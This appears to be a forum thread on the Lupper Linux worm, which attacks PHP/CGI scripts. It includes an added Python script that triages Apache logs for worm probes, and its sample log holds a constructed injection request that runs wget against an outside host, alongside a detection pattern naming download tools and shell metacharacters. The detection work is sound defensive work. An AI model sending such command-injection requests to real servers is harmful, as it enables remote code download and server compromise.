Linux Lupper.Worm In the Wild
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm, which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious HTTP requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
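As an added example, not code from the thread or from McAfee: a small Python triage of Apache access logs for the behaviour the summary describes, a source that blindly walks the script URLs the thread names (xmlrpc.php, awstats) and sends a fetch command in a query string. The log lines, IP addresses and indicator list are constructed assumptions, not vendor signatures.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not from the thread or McAfee).
# 198.51.100.9 behaves like the blind probing the summary describes: it walks
# several script URLs, most of them absent, and one request carries a fetch command.
SAMPLE_LOG = """\
192.0.2.1 - - [07/Nov/2005:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Nov/2005:10:01:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "WordPress/1.5"
198.51.100.9 - - [07/Nov/2005:10:02:11 +0000] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "-"
198.51.100.9 - - [07/Nov/2005:10:02:12 +0000] "GET /cgi-bin/awstats.pl?config=x HTTP/1.0" 404 290 "-" "-"
198.51.100.9 - - [07/Nov/2005:10:02:13 +0000] "GET /blog/xmlrpc.php?p=wget%20http://203.0.113.77/l HTTP/1.0" 200 312 "-" "-"
"""

# Script names the thread mentions; extend with the paths from the vendor write-up.
PROBED_SCRIPTS = re.compile(r"(xmlrpc\.php|awstats\.pl)$", re.I)
# Assumption: download tools and shell separators are rare in legitimate
# query strings for these scripts, so they mark a request worth a closer look.
COMMAND_HINTS = re.compile(r"(wget|curl|/bin/sh|[;|`])", re.I)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def triage(log_text):
    """Summarise, per source IP, requests that touched a probed script.
    'probes' counts all such requests, 'hits' the 2xx ones (the only cases
    where a vulnerable script could actually have run), and 'suspicious'
    lists targets whose decoded query string contains a command hint."""
    report = defaultdict(lambda: {"probes": 0, "hits": 0, "suspicious": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-standard line; skip rather than guess
        path, _, query = m["target"].partition("?")
        if not PROBED_SCRIPTS.search(path):
            continue
        entry = report[m["ip"]]
        entry["probes"] += 1
        if m["status"].startswith("2"):
            entry["hits"] += 1
        if COMMAND_HINTS.search(unquote(query)):
            entry["suspicious"].append(m["target"])
    return dict(report)

if __name__ == "__main__":
    for ip, entry in triage(SAMPLE_LOG).items():
        print(ip, entry)
```

A source with several probes, mostly 404s, and at least one suspicious hit is the pattern to pull host logs for; a single clean 2xx to xmlrpc.php from a known client is ordinary traffic.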
Remarkably Useless page. (Score:5, Interesting)
Second, how do you remove it? Quoth the page:
Been around earlier? (Score:1, Interesting)
Too many ifs (Score:5, Interesting)
which in practice means that your admin died a couple of years ago but was never replaced.
Linux? (Score:2, Interesting)
Re:PHP exploit, not directly a linux problem? (Score:3, Interesting)
Please Rate This Worm Info!! (Score:3, Interesting)
Let McAfee know how well they're trolling.
Re:Too many ifs (Score:1, Interesting)
Re:How can we get some free press? (Score:2, Interesting)
It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...
Re:Before all teh MSFT fanboys jump on this, (Score:3, Interesting)
"Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser)."
And since MS included IE by default, enabled it by default, and made it almost impossible to uninstall, all you MS defenders are invited to take a long walk off a short pier. BTW, that update is less than 2 years old, so it's not like I'm really digging in the crates to find that one or making "OMG teh BSOD!" Win98 jokes.
Re:CONTINUE: (Score:3, Interesting)
Lupper? Isn't that a 3:00 pm meal... (Score:3, Interesting)
Re:So let me get this straight (Score:3, Interesting)
Linux has a smaller market share than Mac OS X, yet it's still getting targeted by virus writers?
... just so you don't need to feel left out. But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-Windows users on a weekly basis (maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
Re:CONTINUE: (Score:3, Interesting)
I find it kind of strange, however, that if you go to services/xmlrpc.php on my website, you get a webpage that is actually services.html. No services/xmlrpc.php or even a services directory exists in my htdocs folder. Going to plain xmlrpc.php brings up a 404. However, I scanned for open UDP ports and neither 7111 nor 7222 is open, so according to McAfee I'm not infected. I'm probably just unknowledgeable about what xmlrpc.php is, but it is still strange.
Re:It's not Windows (Score:2, Interesting)
Once any system is compromised, you generally have to assume that the attacker escalated their privileges using other exploits. If you had auditing enabled, you might be able to demonstrate that this did not happen, but if you had auditing enabled you probably reinstalled already!
The problem with these sorts of compromise is in some shared hosting environments, where the end user could have installed vulnerable PHP. So it doesn't really matter how good the admin or OS is, unless the OS has specific facilities to mitigate this sort of attack.
I wouldn't take people seeing awstats attempts as proof of the worm; I've been seeing awstats exploit attempts for years. That is usually just run-of-the-mill hacking attempts, semi-automated scanning, or earlier worms.
not a good practice.. (Score:1, Interesting)
Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering
That's happened to me exactly once in my 10+ year career, but once was too much!
Re:no login shell (Score:3, Interesting)
You should be using mod_security.
http://understudy.net/tutorials.php?name=wget comes back failed. You can run limited-ability shell accounts such as scponlyc (chrooted version of scponly).
And the servers I run on are all FreeBSD based.
Mod security can be found here:
http://modsecurity.org/
http://www.gotroot.com/tiki-index.php?page=mod_se
http://www.onlamp.com/pub/a/apache/2003/11/26/mod
IE is not cross-platform (Score:3, Interesting)